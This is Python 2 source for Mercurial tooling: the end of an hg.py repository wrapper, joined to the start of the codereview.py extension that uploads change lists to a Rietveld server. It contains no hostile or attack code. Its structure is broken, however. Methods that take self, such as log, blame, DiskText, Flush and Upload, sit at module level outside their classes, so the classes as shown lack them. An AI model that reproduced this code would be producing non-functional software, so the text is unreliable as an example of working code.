    """Return the names of all tags (including 'tip')."""
    return self._parse_heads([HG, 'tags'])
def bookmarks(self):
    """Return bookmark names, or an empty list when none are set."""
    output = self._command([HG, 'bookmarks'])
    if output.startswith('no bookmarks set'):
        return []
    names = []
    for line in output.splitlines():
        m = bookmarks_rx.match(line)
        assert m, 'unexpected output: ' + line
        names.append(m.group('name'))
    return names
def heads(self):
    """Return every head name: branches, then tags, then bookmarks."""
    result = list(self.branches())
    result.extend(self.tags())
    result.extend(self.bookmarks())
    return result
def empty(self):
    """Return True when the repository contains no changesets."""
    # One 'a' is printed per changeset; empty output means no commits.
    return self._command([HG, 'log', '--template=a', '-l1']) == ''
def __contains__(self, rev):
    """Return True when rev resolves to a changeset (judged by hg's exit status)."""
    cmd = [HG, 'log', '--template=a', '-r', str(rev)]
    proc = subprocess.Popen(cmd, cwd=self.path, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)
    proc.communicate()
    return proc.returncode == 0
def __len__(self):
    """Return the number of changesets (tip's local rev number plus one)."""
    return int(self._command([HG, 'id', '-n', '-r', 'tip'])) + 1
def log(self, revrange=None, limit=None, firstparent=False, merges=None,
        path=None, follow=False):
    """Return commit log entries.

    revrange may be None (all), a single rev (returns one CommitLogEntry),
    or a (start, end) pair where either end may be None.  merges=True keeps
    only merges, merges=False excludes them.
    """
    # NUL-separated template fields; a double NUL terminates each entry.
    cmd = [HG, 'log', '--debug', '--template={node}\\0{parents}\\0'
           '{date|hgdate}\\0{author|nonempty}\\0{desc|tabindent|nonempty}\\0\\0']
    if limit is not None:
        cmd.append('-l' + str(limit))
    if firstparent:
        cmd.append('--follow-first')
    if merges is not None:
        if merges:
            cmd.append('--only-merges')
        else:
            cmd.append('--no-merges')
    single = False
    if revrange is None:
        pass
    elif isinstance(revrange, (tuple, list)):
        # (start, end): emit newest-first the revisions reachable from end
        # but not from start; None means unbounded on that side.
        if revrange[0] is None:
            if revrange[1] is None:
                pass
            else:
                cmd.extend(['-r', 'reverse(ancestors(%s))' % revrange[1]])
        else:
            if revrange[1] is None:
                cmd.extend(['-r', 'reverse(descendants(%s))' % revrange[0]])
            else:
                cmd.extend(['-r', 'reverse(ancestors(%s))' % revrange[1], '--prune', str(revrange[0])])
    else:
        # Single revision: return the entry itself rather than a list.
        cmd.extend(['-r', str(revrange)])
        single = True
    if path:
        if follow:
            cmd.append('--follow')
        cmd.extend(['--', type(self).cleanPath(path)])
    output = self._command(cmd)
    results = []
    logs = output.split('\0\0')
    logs.pop()  # drop the empty string after the final terminator
    for log in logs:
        rev, parents, date, author, message = log.split('\0', 4)
        # --debug prints parents as "rev:node"; rev -1 marks a null parent.
        parents = [x[1] for x in filter(lambda x: x[0] != '-1',
                   (x.split(':') for x in parents.split()))]
        date = parse_hgdate(date)
        # Undo the tabindent applied by the template to multi-line messages.
        message = message.replace('\n\t', '\n')
        entry = CommitLogEntry(rev, parents, date, author, message)
        if single:
            return entry
        results.append(entry)
    return results
def pdiff(self, rev):
    """Return the diff of rev against its parent.

    The template prints a single 'a' before the patch; [1:] strips it.
    """
    out = self._command([HG, 'log', '--template=a', '-p', '-r', str(rev)])
    return out[1:]
def diff(self, rev_a, rev_b, path=None):
    """Return the diff between rev_a and rev_b, optionally restricted to path."""
    args = [HG, 'diff', '-r', rev_a, '-r', rev_b]
    if path is not None:
        args += ['--', type(self).cleanPath(path)]
    return self._command(args)
def ancestor(self, rev1, rev2):
    """Return the node id of rev1 and rev2's common ancestor, or None if none."""
    revset = 'ancestor(%s, %s)' % (rev1, rev2)
    out = self._command([HG, 'log', '--template={node}', '-r', revset])
    return out or None
def _blame(self, rev, path):
    """Annotate path at rev; return a list of blame_tuple(node, author, date, text).

    Runs 'hg annotate' for per-line rev numbers/authors and pairs each line
    with the file contents from _cat.  A memo dict avoids re-running
    'hg log' for revisions already resolved to (node id, date).
    """
    cmd = [HG, 'annotate', '-unv', '-r', rev, '--', path]
    output = self._command(cmd)
    revs = {}  # local rev number -> (node id, parsed date)
    results = []
    cat = self._cat(rev, path)
    for line, text in zip(output.splitlines(), cat.splitlines()):
        m = annotate_rx.match(line)
        assert m, 'unexpected output: ' + line
        local_rev, author = m.group('rev', 'author')
        try:
            node, date = revs[local_rev]
        except KeyError:
            cmd = [HG, 'log', '--template={node}\n{date|hgdate}', '-r', local_rev]
            node, date = self._command(cmd).split('\n', 1)
            date = parse_hgdate(date)
            # BUG FIX: previously the memo was stored under the node id
            # while lookups used the local rev number, so the cache never
            # hit and every line ran its own 'hg log'.
            revs[local_rev] = node, date
        results.append(blame_tuple(node, author, date, text))
    return results
def blame(self, rev, path):
    """Annotate path at rev; raise BadFileType unless it is a regular file."""
    cleaned = type(self).cleanPath(path)
    entries = self.ls(rev, cleaned, directory=True)
    assert len(entries) == 1
    if entries[0].get('type') != 'f':
        raise BadFileType(rev, cleaned)
    return self._blame(str(rev), cleaned)
# ---- end of hg.py ----
# coding=utf-8
# (The line above is necessary so that I can use 世界 in the
# *comment* below without Python getting all bent out of shape.)
# Copyright 2007-2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Mercurial interface to codereview.appspot.com.
To configure, set the following options in
your repository's .hg/hgrc file.
[extensions]
codereview = /path/to/codereview.py
[codereview]
server = codereview.appspot.com
The server should be running Rietveld; see http://code.google.com/p/rietveld/.
In addition to the new commands, this extension introduces
the file pattern syntax @nnnnnn, where nnnnnn is a change list
number, to mean the files included in that change list, which
must be associated with the current client.
For example, if change 123456 contains the files x.go and y.go,
"hg diff @123456" is equivalent to"hg diff x.go y.go".
'''
import sys

# This file is only meaningful when loaded by Mercurial as an extension;
# refuse to run as a standalone script.
if __name__ == "__main__":
    print >>sys.stderr, "This is a Mercurial extension and should not be invoked directly."
    sys.exit(2)

# We require Python 2.6 for the json package.
# NOTE(review): a lexical string comparison of version numbers — fine for
# the 2.x series this extension targets.
if sys.version < '2.6':
    print >>sys.stderr, "The codereview extension requires Python 2.6 or newer."
    print >>sys.stderr, "You are running Python " + sys.version
    sys.exit(2)
import json
import os
import re
import stat
import subprocess
import threading
import time
from mercurial import commands as hg_commands
from mercurial import util as hg_util
# Default CC list read from configuration — TODO confirm where it is set.
defaultcc = None
# When non-None, holds the reason the extension is disabled.
codereview_disabled = None
# Saved original rollback command (replaced by this extension).
real_rollback = None
# Name of the release branch, when one exists.
releaseBranch = None
# Rietveld server host; overridden by [codereview] server in hgrc.
server = "codereview.appspot.com"
# Full URL prefix for the server, computed at startup.
server_url_base = None
#######################################################################
# Normally I would split this into multiple files, but it simplifies
# import path headaches to keep it all in one file. Sorry.
# The different parts of the file are separated by banners like this one.
#######################################################################
# Helpers
def RelativePath(path, cwd):
    """Return path relative to cwd when path lies strictly inside cwd.

    Otherwise returns path unchanged.  Uses a slice instead of path[n] so
    that path == cwd no longer raises IndexError (the original indexed one
    character past the end in that case).
    """
    n = len(cwd)
    if path.startswith(cwd) and path[n:n+1] == '/':
        return path[n+1:]
    return path
def Sub(l1, l2):
    """Return the elements of l1 that are not in l2, preserving order."""
    result = []
    for item in l1:
        if item not in l2:
            result.append(item)
    return result
def Add(l1, l2):
    """Return the sorted union of l1 and l2 (elements of l2 already in l1 dropped)."""
    merged = l1 + [item for item in l2 if item not in l1]
    merged.sort()
    return merged
def Intersect(l1, l2):
    """Return the elements of l1 that also appear in l2, preserving l1's order."""
    common = []
    for item in l1:
        if item in l2:
            common.append(item)
    return common
#######################################################################
# RE: UNICODE STRING HANDLING
#
# Python distinguishes between the str (string of bytes)
# and unicode (string of code points) types. Most operations
# work on either one just fine, but some (like regexp matching)
# require unicode, and others (like write) require str.
#
# As befits the language, Python hides the distinction between
# unicode and str by converting between them silently, but
# *only* if all the bytes/code points involved are 7-bit ASCII.
# This means that if you're not careful, your program works
# fine on "hello, world" and fails on "hello, 世界". And of course,
# the obvious way to be careful - use static types - is unavailable.
# So the only way is trial and error to find where to put explicit
# conversions.
#
# Because more functions do implicit conversion to str (string of bytes)
# than do implicit conversion to unicode (string of code points),
# the convention in this module is to represent all text as str,
# converting to unicode only when calling a unicode-only function
# and then converting back to str as soon as possible.
def typecheck(s, t):
    """Abort unless the concrete type of s is exactly t (no subclass leniency)."""
    actual = type(s)
    if actual == t:
        return
    raise hg_util.Abort("type check failed: %s has type %s != %s" % (repr(s), actual, t))
# If we have to pass unicode instead of str, ustr does that conversion clearly.
def ustr(s):
    """Decode a UTF-8 str into unicode, type-checking the input first."""
    typecheck(s, str)
    decoded = s.decode("utf-8")
    return decoded
# Even with those, Mercurial still sometimes turns unicode into str
# and then tries to use it as ascii. Change Mercurial's default.
def set_mercurial_encoding_to_utf8():
    """Force Mercurial's internal encoding to UTF-8 (its default may be ascii)."""
    from mercurial import encoding
    encoding.encoding = 'utf-8'

# Applied at import time so every subsequent Mercurial call sees UTF-8.
set_mercurial_encoding_to_utf8()
# Even with those we still run into problems.
# I tried to do things by the book but could not convince
# Mercurial to let me check in a change with UTF-8 in the
# CL description or author field, no matter how many conversions
# between str and unicode I inserted and despite changing the
# default encoding. I'm tired of this game, so set the default
# encoding for all of Python to 'utf-8', not 'ascii'.
def default_to_utf8():
    """Set Python's process-wide default encoding to UTF-8 (Python 2 only)."""
    import sys
    # Preserve the stdout objects: reload(sys) would otherwise reset them.
    stdout, __stdout__ = sys.stdout, sys.__stdout__
    reload(sys)  # site.py deleted setdefaultencoding; get it back
    sys.stdout, sys.__stdout__ = stdout, __stdout__
    sys.setdefaultencoding('utf-8')

# Applied at import time; see the explanation in the comments above.
default_to_utf8()
#######################################################################
# Status printer for long-running commands
# Most recent status message, displayed periodically by StatusThread.
global_status = None

def set_status(s):
    """Record (and, when verbose, immediately print) the current status string."""
    # NOTE(review): 'verbosity' is defined elsewhere in this extension — TODO confirm.
    if verbosity > 0:
        print >>sys.stderr, time.asctime(), s
    global global_status
    global_status = s
class StatusThread(threading.Thread):
    """Daemon thread that periodically prints global_status to stderr."""
    def __init__(self):
        threading.Thread.__init__(self)
    def run(self):
        # pause a reasonable amount of time before
        # starting to display status messages, so that
        # most hg commands won't ever see them.
        time.sleep(30)
        # now show status every 15 seconds
        while True:
            # Align wakeups to 15-second wall-clock boundaries.
            time.sleep(15 - time.time() % 15)
            s = global_status
            if s is None:
                continue
            if s == "":
                s = "(unknown status)"
            print >>sys.stderr, time.asctime(), s
def start_status_thread():
    """Spawn the daemon thread that periodically prints global_status."""
    thread = StatusThread()
    thread.setDaemon(True)  # daemonized: the process may exit while it runs
    thread.start()
#######################################################################
# Change list parsing.
#
# Change lists are stored in .hg/codereview/cl.nnnnnn
# where nnnnnn is the number assigned by the code review server.
# Most data about a change list is stored on the code review server
# too: the description, reviewer, and cc list are all stored there.
# The only thing in the cl.nnnnnn file is the list of relevant files.
# Also, the existence of the cl.nnnnnn file marks this repository
# as the one where the change list lives.
# Placeholder diff uploaded when a CL is created before it has any files,
# so the server always receives a syntactically valid patch.
emptydiff = """Index: ~rietveld~placeholder~
===================================================================
diff --git a/~rietveld~placeholder~ b/~rietveld~placeholder~
new file mode 100644
"""
class CL(object):
    """An in-memory change list, mirrored to .hg/codereview/cl.<n> and the server."""
    def __init__(self, name):
        typecheck(name, str)
        self.name = name        # CL number as a string, or "new"
        self.desc = ''          # description text
        self.files = []         # file names included in this CL
        self.reviewer = []      # reviewer addresses
        self.cc = []            # CC addresses
        self.url = ''           # server URL for this CL, once known
        self.local = False      # True when a cl.<n> file exists locally
        self.web = False        # True when synced with the code review server
        self.copied_from = None # None means current user
        self.mailed = False     # True once the review mail has been sent
        self.private = False    # True for server-side private CLs
        self.lgtm = []          # (who, first-line) pairs from approval messages
def DiskText(self):
    """Serialize this CL in the format stored in .hg/codereview/cl.<name>."""
    parts = []
    if self.copied_from:
        parts.append("Author: " + self.copied_from + "\n\n")
    if self.private:
        parts.append("Private: " + str(self.private) + "\n")
    parts.append("Mailed: " + str(self.mailed) + "\n")
    parts.append("Description:\n")
    parts.append(Indent(self.desc, "\t"))
    parts.append("Files:\n")
    for name in self.files:
        parts.append("\t" + name + "\n")
    text = "".join(parts)
    typecheck(text, str)
    return text
def EditorText(self):
    """Render this CL as the editable text shown in the user's editor."""
    parts = [_change_prolog, "\n"]
    if self.copied_from:
        parts.append("Author: " + self.copied_from + "\n")
    if self.url != '':
        parts.append('URL: ' + self.url + ' # cannot edit\n\n')
    if self.private:
        parts.append("Private: True\n")
    parts.append("Reviewer: " + JoinComma(self.reviewer) + "\n")
    parts.append("CC: " + JoinComma(self.cc) + "\n")
    parts.append("\n")
    parts.append("Description:\n")
    if self.desc == '':
        parts.append("\t<enter description here>\n")
    else:
        parts.append(Indent(self.desc, "\t"))
    parts.append("\n")
    if self.local or self.name == "new":
        parts.append("Files:\n")
        for name in self.files:
            parts.append("\t" + name + "\n")
        parts.append("\n")
    text = "".join(parts)
    typecheck(text, str)
    return text
def PendingText(self, quick=False):
    """Summarize this CL for 'hg pending'; quick omits reviewers, CC, and files."""
    parts = [self.name + ":" + "\n", Indent(self.desc, "\t"), "\n"]
    if self.copied_from:
        parts.append("\tAuthor: " + self.copied_from + "\n")
    if not quick:
        parts.append("\tReviewer: " + JoinComma(self.reviewer) + "\n")
        for (who, line) in self.lgtm:
            parts.append("\t\t" + who + ": " + line + "\n")
        parts.append("\tCC: " + JoinComma(self.cc) + "\n")
        parts.append("\tFiles:\n")
        for name in self.files:
            parts.append("\t\t" + name + "\n")
    text = "".join(parts)
    typecheck(text, str)
    return text
def Flush(self, ui, repo):
    """Write this CL to disk (atomically via rename) and sync it to the server.

    A brand-new CL is first uploaded so it gets a number to use as its
    file name.
    """
    if self.name == "new":
        self.Upload(ui, repo, gofmt_just_warn=True, creating=True)
    dir = CodeReviewDir(ui, repo)
    path = dir + '/cl.' + self.name
    # Write to a temp name, then rename over the real file.
    f = open(path+'!', "w")
    f.write(self.DiskText())
    f.close()
    if sys.platform == "win32" and os.path.isfile(path):
        # Windows cannot rename over an existing file.
        os.remove(path)
    os.rename(path+'!', path)
    # Only push metadata for CLs we own that the server already knows about.
    if self.web and not self.copied_from:
        EditDesc(self.name, desc=self.desc,
            reviewers=JoinComma(self.reviewer), cc=JoinComma(self.cc),
            private=self.private)
def Delete(self, ui, repo):
    """Remove this CL's on-disk file."""
    os.unlink(CodeReviewDir(ui, repo) + "/cl." + self.name)
def Subject(self):
    """Mail subject: truncated first description line, tagged with the CL number."""
    subject = line1(self.desc)
    if len(subject) > 60:
        subject = subject[0:55] + "..."
    if self.name != "new":
        subject = "code review %s: %s" % (self.name, subject)
    typecheck(subject, str)
    return subject
def Upload(self, ui, repo, send_mail=False, gofmt=True, gofmt_just_warn=False, creating=False, quiet=False):
    """Upload this CL's metadata and diffs to the code review server.

    Updates self.name (for new CLs), self.url, and self.web, then flushes
    the CL back to disk.  Raises hg_util.Abort when the server rejects
    the update.
    """
    if not self.files and not creating:
        ui.warn("no files in change list\n")
    if ui.configbool("codereview", "force_gofmt", True) and gofmt:
        CheckFormat(ui, repo, self.files, just_warn=gofmt_just_warn)
    set_status("uploading CL metadata + diffs")
    os.chdir(repo.root)
    form_fields = [
        ("content_upload", "1"),
        ("reviewers", JoinComma(self.reviewer)),
        ("cc", JoinComma(self.cc)),
        ("description", self.desc),
        ("base_hashes", ""),
    ]
    if self.name != "new":
        form_fields.append(("issue", self.name))
    vcs = None
    # We do not include files when creating the issue,
    # because we want the patch sets to record the repository
    # and base revision they are diffs against. We use the patch
    # set message for that purpose, but there is no message with
    # the first patch set. Instead the message gets used as the
    # new CL's overall subject. So omit the diffs when creating
    # and then we'll run an immediate upload.
    # This has the effect that every CL begins with an empty "Patch set 1".
    if self.files and not creating:
        vcs = MercurialVCS(upload_options, ui, repo)
        data = vcs.GenerateDiff(self.files)
        files = vcs.GetBaseFiles(data)
        if len(data) > MAX_UPLOAD_SIZE:
            # Too big for one request: upload each patch separately below.
            uploaded_diff_file = []
            form_fields.append(("separate_patches", "1"))
        else:
            uploaded_diff_file = [("data", "data.diff", data)]
    else:
        uploaded_diff_file = [("data", "data.diff", emptydiff)]
    if vcs and self.name != "new":
        form_fields.append(("subject", "diff -r " + vcs.base_rev + " " + ui.expandpath("default")))
    else:
        # First upload sets the subject for the CL itself.
        form_fields.append(("subject", self.Subject()))
    ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
    response_body = MySend("/upload", body, content_type=ctype)
    patchset = None
    msg = response_body
    lines = msg.splitlines()
    # Response format: status line, patchset id, then "<id> <filename>" rows.
    if len(lines) >= 2:
        msg = lines[0]
        patchset = lines[1].strip()
        patches = [x.split(" ", 1) for x in lines[2:]]
    if response_body.startswith("Issue updated.") and quiet:
        pass
    else:
        ui.status(msg + "\n")
    set_status("uploaded CL metadata + diffs")
    if not response_body.startswith("Issue created.") and not response_body.startswith("Issue updated."):
        raise hg_util.Abort("failed to update issue: " + response_body)
    # The issue number is the final path component of the status line's URL.
    issue = msg[msg.rfind("/")+1:]
    self.name = issue
    if not self.url:
        self.url = server_url_base + self.name
    if not uploaded_diff_file:
        set_status("uploading patches")
        # NOTE(review): 'rpc' is a global defined elsewhere in this extension — TODO confirm.
        patches = UploadSeparatePatches(issue, rpc, patchset, data, upload_options)
    if vcs:
        set_status("uploading base files")
        vcs.UploadBaseFiles(issue, rpc, patches, patchset, upload_options, files)
    if send_mail:
        set_status("sending mail")
        MySend("/" + issue + "/mail", payload="")
    self.web = True
    set_status("flushing changes to disk")
    self.Flush(ui, repo)
    return
def Mail(self, ui, repo):
    """Send the review-request mail for this CL and mark it as mailed."""
    greeting = "Hello " + JoinComma(self.reviewer)
    if self.cc:
        greeting += " (cc: %s)" % (', '.join(self.cc),)
    greeting += ",\n"
    greeting += "\n"
    repourl = ui.expandpath("default")
    if not self.mailed:
        greeting += "I'd like you to review this change to\n" + repourl + "\n"
    else:
        greeting += "Please take another look.\n"
    typecheck(greeting, str)
    PostMessage(ui, self.name, greeting, subject=self.Subject())
    self.mailed = True
    self.Flush(ui, repo)
def GoodCLName(name):
    """Truthy (a match object) when name looks like a CL number: digits only."""
    typecheck(name, str)
    return re.match(r"^[0-9]+$", name)
def ParseCL(text, name):
    """Parse the on-disk/editor CL format into a CL object.

    Returns (cl, 0, '') on success or (None, lineno, errmsg) on a parse
    error.  Recognized section headers are the keys of 'sections' below;
    indented (or blank) lines belong to the current section.
    """
    typecheck(text, str)
    typecheck(name, str)
    sname = None   # current section name
    lineno = 0
    sections = {
        'Author': '',
        'Description': '',
        'Files': '',
        'URL': '',
        'Reviewer': '',
        'CC': '',
        'Mailed': '',
        'Private': '',
    }
    for line in text.split('\n'):
        lineno += 1
        line = line.rstrip()
        if line != '' and line[0] == '#':
            # Comment lines are ignored entirely.
            continue
        if line == '' or line[0] == ' ' or line[0] == '\t':
            # Continuation line: must follow a section header.
            if sname == None and line != '':
                return None, lineno, 'text outside section'
            if sname != None:
                sections[sname] += line + '\n'
            continue
        p = line.find(':')
        if p >= 0:
            s, val = line[:p].strip(), line[p+1:].strip()
            if s in sections:
                sname = s
                if val != '':
                    # Header may carry a value on the same line.
                    sections[sname] += val + '\n'
                continue
        return None, lineno, 'malformed section header'
    for k in sections:
        sections[k] = StripCommon(sections[k]).rstrip()
    cl = CL(name)
    if sections['Author']:
        cl.copied_from = sections['Author']
    cl.desc = sections['Description']
    for line in sections['Files'].split('\n'):
        # Strip trailing '#' comments from file entries.
        i = line.find('#')
        if i >= 0:
            line = line[0:i].rstrip()
        line = line.strip()
        if line == '':
            continue
        cl.files.append(line)
    cl.reviewer = SplitCommaSpace(sections['Reviewer'])
    cl.cc = SplitCommaSpace(sections['CC'])
    cl.url = sections['URL']
    if sections['Mailed'] != 'False':
        # Odd default, but avoids spurious mailings when
        # reading old CLs that do not have a Mailed: line.
        # CLs created with this update will always have
        # Mailed: False on disk.
        cl.mailed = True
    if sections['Private'] in ('True', 'true', 'Yes', 'yes'):
        cl.private = True
    if cl.desc == '<enter description here>':
        cl.desc = ''
    return cl, 0, ''
def SplitCommaSpace(s):
    """Split a comma-separated string into items; empty input yields []."""
    typecheck(s, str)
    stripped = s.strip()
    if not stripped:
        return []
    return re.split(", *", stripped)
def CutDomain(s):
    """Strip an e-mail address down to its local part (text before '@')."""
    typecheck(s, str)
    at = s.find('@')
    if at >= 0:
        return s[0:at]
    return s
def JoinComma(l):
    """Join a list of strings with ', ', type-checking every element."""
    for item in l:
        typecheck(item, str)
    return ", ".join(l)
def ExceptionDetail():
    """Format the exception currently being handled as 'TypeName: detail'."""
    name = str(sys.exc_info()[0])
    # Unwrap "<type '...'>" (old-style) or "<class '...'>" representations.
    if name.startswith("<type '") and name.endswith("'>"):
        name = name[7:-2]
    elif name.startswith("<class '") and name.endswith("'>"):
        name = name[8:-2]
    detail = str(sys.exc_info()[1])
    if detail:
        name += ": " + detail
    return name
def IsLocalCL(ui, repo, name):
    """Truthy when name is a CL number whose cl.<n> file exists in this repo."""
    ok = GoodCLName(name)
    return ok and os.access(CodeReviewDir(ui, repo) + "/cl." + name, 0)
# Load CL from disk and/or the web.
def LoadCL(ui, repo, name, web=True):
    """Load CL 'name' from disk and, when web=True, refresh it from the server.

    Returns (cl, '') on success or (None, errmsg) on failure.
    """
    typecheck(name, str)
    set_status("loading CL " + name)
    if not GoodCLName(name):
        return None, "invalid CL name"
    dir = CodeReviewDir(ui, repo)
    path = dir + "cl." + name
    if os.access(path, 0):
        ff = open(path)
        text = ff.read()
        ff.close()
        cl, lineno, err = ParseCL(text, name)
        if err != "":
            return None, "malformed CL data: "+err
        cl.local = True
    else:
        cl = CL(name)
    if web:
        set_status("getting issue metadata from web")
        d = JSONGet(ui, "/api/" + name + "?messages=true")
        set_status(None)
        if d is None:
            return None, "cannot load CL %s from server" % (name,)
        # Sanity-check the server response before trusting it.
        if 'owner_email' not in d or 'issue' not in d or str(d['issue']) != name:
            return None, "malformed response loading CL data from code review server"
        cl.dict = d
        cl.reviewer = d.get('reviewers', [])
        cl.cc = d.get('cc', [])
        if cl.local and cl.copied_from and cl.desc:
            # local copy of CL written by someone else
            # and we saved a description. use that one,
            # so that committers can edit the description
            # before doing hg submit.
            pass
        else:
            cl.desc = d.get('description', "")
        cl.url = server_url_base + name
        cl.web = True
        cl.private = d.get('private', False) != False
        cl.lgtm = []
        # Collect LGTM/NOT-LGTM verdicts: sender local part + first line.
        for m in d.get('messages', []):
            if m.get('approval', False) == True or m.get('disapproval', False) == True:
                who = re.sub('@.*', '', m.get('sender', ''))
                text = re.sub("\n(.|\n)*", '', m.get('text', ''))
                cl.lgtm.append((who, text))
    set_status("loaded CL " + name)
    return cl, ''
class LoadCLThread(threading.Thread):
    """Worker thread that loads one CL; the result lands in self.cl (or None)."""
    def __init__(self, ui, repo, dir, f, web):
        threading.Thread.__init__(self)
        self.ui = ui
        self.repo = repo
        self.dir = dir
        self.f = f      # file name of the form "cl.<number>"
        self.web = web
        self.cl = None  # set by run() on success
    def run(self):
        # f[3:] strips the "cl." prefix to get the CL number.
        cl, err = LoadCL(self.ui, self.repo, self.f[3:], web=self.web)
        if err != '':
            self.ui.warn("loading "+self.dir+self.f+": " + err + "\n")
            return
        self.cl = cl
# Load all the CLs from this repository.
def LoadAllCL(ui, repo, web=True):
    """Load every cl.* file in this repository, in parallel threads.

    Returns a dict mapping CL name -> CL; CLs that fail to load are
    warned about and omitted.
    """
    dir = CodeReviewDir(ui, repo)
    m = {}
    files = [f for f in os.listdir(dir) if f.startswith('cl.')]
    if not files:
        return m
    active = []
    first = True
    for f in files:
        t = LoadCLThread(ui, repo, dir, f, web)
        t.start()
        if web and first:
            # first request: wait in case it needs to authenticate
            # otherwise we get lots of user/password prompts
            # running in parallel.
            t.join()
            if t.cl:
                m[t.cl.name] = t.cl
            first = False
        else:
            active.append(t)
    for t in active:
        t.join()
        if t.cl:
            m[t.cl.name] = t.cl
    return m
# Find repository root. On error, ui.warn and return None
def RepoDir(ui, repo):
    """Return repo's local filesystem path, or None (with a warning) if not file-based."""
    location = repo.url()
    if not location.startswith('file:'):
        ui.warn("repository %s is not in local file system\n" % (location,))
        return None
    location = location[5:]  # strip the "file:" scheme
    if location.endswith('/'):
        location = location[:-1]
    typecheck(location, str)
    return location
# Find (or make) code review directory. On error, ui.warn and return None
def CodeReviewDir(ui, repo):
    """Find (or create) <repo>/.hg/codereview/; warn and return None on failure.

    The returned path always ends with '/'.
    """
    dir = RepoDir(ui, repo)
    if dir == None:
        return None
    dir += '/.hg/codereview/'
    if not os.path.isdir(dir):
        try:
            # 0o700 (valid since Python 2.6, which this extension requires)
            # replaces the Python-2-only literal 0700.
            os.mkdir(dir, 0o700)
        except OSError:
            # Narrowed from a bare 'except:': os.mkdir reports failure
            # via OSError; a bare except also swallowed KeyboardInterrupt.
            ui.warn('cannot mkdir %s: %s\n' % (dir, ExceptionDetail()))
            return None
    typecheck(dir, str)
    return dir
# Turn leading tabs into spaces, so that the common white space
# prefix doesn't get confused when people's editors write out
# some lines with spaces, some with tabs. Only a heuristic
# (some editors don't use 8 spaces either) but a useful one.
def TabsToSpaces(line):
    """Expand each leading tab to 8 spaces; the rest of the line is untouched."""
    body = line.lstrip('\t')
    ntabs = len(line) - len(body)
    return ' ' * (8 * ntabs) + body
# Strip maximal common leading white space prefix from text
def StripCommon(text):
    """Remove the longest whitespace prefix shared by all non-blank lines.

    Leading tabs are normalized via TabsToSpaces first.  Returns text
    unchanged when it has no non-blank lines.
    """
    typecheck(text, str)
    ws = None  # running common whitespace prefix; None until first non-blank line
    for line in text.split('\n'):
        line = line.rstrip()
        if line == '':
            continue
        line = TabsToSpaces(line)
        # The line's own leading whitespace.
        white = line[:len(line)-len(line.lstrip())]
        if ws == None:
            ws = white
        else:
            # Shrink ws to the longest prefix it shares with this line.
            common = ''
            for i in range(min(len(white), len(ws))+1):
                if white[0:i] == ws[0:i]:
                    common = white[0:i]
            ws = common
        if ws == '':
            break
    if ws == None:
        return text
    t = ''
    for line in text.split('\n'):
        line = line.rstrip()
        line = TabsToSpaces(line)
        if line.startswith(ws):
            line = line[len(ws):]
        # Drop blank lines at the very top of the output.
        if line == '' and t == '':
            continue
        t += line + '\n'
    # Collapse any trailing blank lines to a single final newline.
    while len(t) >= 2 and t[-2:] == '\n\n':
        t = t[:-1]
    typecheck(t, str)
    return t
# Indent text with indent.
def Indent(text, indent):
    """Prefix every line of text with indent; the result always ends in a newline."""
    typecheck(text, str)
    typecheck(indent, str)
    out = ''.join(indent + line + '\n' for line in text.split('\n'))
    typecheck(out, str)
    return out
# Return the first line of l
def line1(text):
    """Return everything before the first newline of text."""
    typecheck(text, str)
    return text.split('\n', 1)[0]
_change_prolog = """# Change list.
# Lines beginning with # are ignored.
# Multi-line values should be indented.
"""
desc_re = '^(.+: |(tag )?(release|weekly)\.|fix build|undo CL)'
desc_msg = '''Your CL description appears not to use the standard form.
The first line of your change description is conventionally a
one-line summary of the change, prefixed by the primary affected package,
and is used as the subject for code review mail; the rest of the description
elaborates.
Examples:
encoding/rot13: new package
math: add IsInf, IsNaN
net: fix cname in LookupHost
unicode: update to Unicode 5.0.2
'''
def promptyesno(ui, msg):
    """Ask a yes/no question; True means yes (which is also the default)."""
    answer = ui.promptchoice(msg, ["&yes", "&no"], 0)
    return answer == 0
def promptremove(ui, repo, f):
    """Offer to 'hg remove' f; warn when the removal fails."""
    if not promptyesno(ui, "hg remove %s (y/n)?" % (f,)):
        return
    if hg_commands.remove(ui, repo, 'path:'+f) != 0:
        ui.warn("error removing %s" % (f,))
def promptadd(ui, repo, f):
    """Offer to 'hg add' f; warn when the add fails."""
    if not promptyesno(ui, "hg add %s (y/n)?" % (f,)):
        return
    if hg_commands.add(ui, repo, 'path:'+f) != 0:
        ui.warn("error adding %s" % (f,))
def EditCL(ui, repo, cl):
    """Open cl in the user's editor and loop until the edit parses and validates.

    Returns '' on success (cl updated in place) or a message when the user
    declines to re-edit after an error.
    """
    set_status(None)  # do not show status
    s = cl.EditorText()
    while True:
        s = ui.edit(s, ui.username())
        # We can't trust Mercurial + Python not to die before making the change,
        # so, by popular demand, just scribble the most recent CL edit into
        # $(hg root)/last-change so that if Mercurial does die, people
        # can look there for their work.
        try:
            f = open(repo.root+"/last-change", "w")
            f.write(s)
            f.close()
        except:
            # Best-effort backup only; never block the edit on it.
            pass
        clx, line, err = ParseCL(s, cl.name)
        if err != '':
            if not promptyesno(ui, "error parsing change list: line %d: %s\nre-edit (y/n)?" % (line, err)):
                return "change list not modified"
            continue
        # Check description.
        if clx.desc == '':
            if promptyesno(ui, "change list should have a description\nre-edit (y/n)?"):
                continue
        elif re.search('<enter reason for undo>', clx.desc):
            if promptyesno(ui, "change list description omits reason for undo\nre-edit (y/n)?"):
                continue
        elif not re.match(desc_re, clx.desc.split('\n')[0]):
            if promptyesno(ui, desc_msg + "re-edit (y/n)?"):
                continue
        # Check file list for files that need to be hg added or hg removed
        # or simply aren't understood.
        pats = ['path:'+f for f in clx.files]
        changed = hg_matchPattern(ui, repo, *pats, modified=True, added=True, removed=True)
        deleted = hg_matchPattern(ui, repo, *pats, deleted=True)
        unknown = hg_matchPattern(ui, repo, *pats, unknown=True)
        ignored = hg_matchPattern(ui, repo, *pats, ignored=True)
        clean = hg_matchPattern(ui, repo, *pats, clean=True)
        files = []
        for f in clx.files:
            if f in changed:
                files.append(f)
                continue
            if f in deleted:
                promptremove(ui, repo, f)
                files.append(f)
                continue
            if f in unknown:
